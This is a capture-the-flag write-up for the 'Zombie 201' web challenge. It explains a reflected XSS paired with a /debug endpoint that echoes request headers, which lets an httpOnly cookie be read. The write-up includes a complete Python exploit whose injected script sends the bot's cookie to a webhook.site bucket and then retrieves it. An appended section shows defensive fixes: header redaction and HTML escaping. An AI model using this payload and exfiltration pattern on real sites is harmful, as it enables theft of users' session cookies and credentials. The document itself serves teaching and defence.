Tags: web xss

This writeup can also be found at [https://www.bugsbunnies.tk/2023/03/18/zombie.html](https://www.bugsbunnies.tk/2023/03/18/zombie.html).

We're presented with a simple webpage.

![Webpage](https://www.bugsbunnies.tk/assets/images/2023-03-20%2008-29-33.png)

By submitting `<script>alert(1)</script>` to the first input we can see that it is reflected without sanitization. This means we can inject arbitrary JavaScript into the page, making this an XSS vulnerability.

The user input is submitted as a URL parameter like this: `https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ealert%281%29%3C%2Fscript%3E`.

This URL can be submitted through the second input field, and a bot will then visit it.

The webpage is the same for all versions of the challenge, only the config changes slightly.

For Zombie 201 the config is as follows:

```json
{
  "flag": "wctf{redacted}",
  "httpOnly": true,
  "allowDebug": true
}
```

The config is used to construct a cookie holding the flag, which is set on the bot when it visits the page. With `httpOnly` set, injected script cannot read that cookie from `document.cookie`, so a plain XSS is not enough on its own.

Looking at the source code, however, we find an interesting endpoint:

```js
// useful for debugging cloud deployments
app.get("/debug", function (req, res) {
  if (config.allowDebug) {
    // echoes every request header back to the caller, Cookie included
    res.send({ "remote-ip": req.socket.remoteAddress, ...req.headers });
  } else {
    res.send("sorry, debug endpoint is not enabled");
  }
});
```

Because `/debug` echoes all request headers, including `Cookie`, the `httpOnly` flag no longer protects the flag: the injected script can `fetch("/debug")` from the bot's origin and read the cookie out of the JSON response. Using this through the reflected XSS, we can exfiltrate the cookie:

```python
import requests
import os
import json
import urllib.parse

# setup bucket: reuse a cached webhook.site bucket id, or create a new one
token_path = ".webhook-site.token"
if os.path.exists(token_path):
    with open(token_path, "r") as f:
        bucket_id = f.read()
else:
    r = requests.post("https://webhook.site/token")
    bucket_id = r.json()["uuid"]
    with open(token_path, "w") as f:
        f.write(bucket_id)

bucket_url = f"https://webhook.site/{bucket_id}"
print(f"https://webhook.site/#!/{bucket_id}/")

# execute exploit
base_base = 'https://zombie-201-tlejfksioa-ul.a.run.app'
visit_base = f'{base_base}/visit?url='
show_base = f'{base_base}/zombie?show='
# the injected script fetches /debug (which echoes the bot's headers, Cookie included)
# and forwards the JSON to the webhook bucket as a query parameter
payload = f"""
<script>
(async function() {{
    await fetch("{bucket_url}?cookie=" + JSON.stringify(await (await fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug")).json()))
}})();
</script>
"""

# double-encode: the show= payload is nested inside the url= parameter given to the bot
target_url = visit_base + urllib.parse.quote_plus(show_base + urllib.parse.quote_plus(payload))
print("sending", target_url)
r = requests.get(target_url)
print(r.text)

# fetch result: the newest captured request's cookie parameter holds the /debug JSON
r = requests.get(f"https://webhook.site/token/{bucket_id}/requests?sorting=newest")
print(json.loads(r.json()["data"][0]["query"]["cookie"])["cookie"])
```
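As an added example that is not part of the original writeup or the challenge code, here are the two server-side fixes this chain depends on being absent: a `/debug` view that redacts credential-bearing headers, and HTML-escaping of the reflected `show` parameter. The request and config shapes follow the Express code above; the sample request is constructed.

```javascript
// Added example (not the challenge's own code). Assumes Express-style req objects
// (Node lowercases header names) and a config object with the challenge's fields.
const SENSITIVE_HEADERS = new Set(["cookie", "authorization", "proxy-authorization"]);

// Fix 1: the debug view must never echo credential-bearing headers, otherwise
// httpOnly cookies become readable by any script running on the origin.
function debugView(req, config) {
  if (!config.allowDebug) {
    return { status: 403, body: "sorry, debug endpoint is not enabled" };
  }
  const headers = {};
  for (const [name, value] of Object.entries(req.headers)) {
    headers[name] = SENSITIVE_HEADERS.has(name.toLowerCase()) ? "[redacted]" : value;
  }
  return { status: 200, body: { "remote-ip": req.socket.remoteAddress, ...headers } };
}

// Fix 2: the show= parameter must be HTML-escaped before it is reflected into
// the page, so a <script> tag in the input is rendered as inert text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderShow(show) {
  return `<p>${escapeHtml(show)}</p>`;
}

// Constructed request resembling what the bot sends when it visits the page.
const sampleReq = {
  socket: { remoteAddress: "10.0.0.5" },
  headers: {
    host: "zombie-201.example",
    cookie: "flag=wctf{redacted}",
    "user-agent": "HeadlessChrome",
  },
};

// Stand-alone demonstration: the cookie is redacted and the script tag is inert.
console.log(JSON.stringify(debugView(sampleReq, { allowDebug: true, httpOnly: true }).body));
console.log(renderShow("<script>alert(1)</script>"));
```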
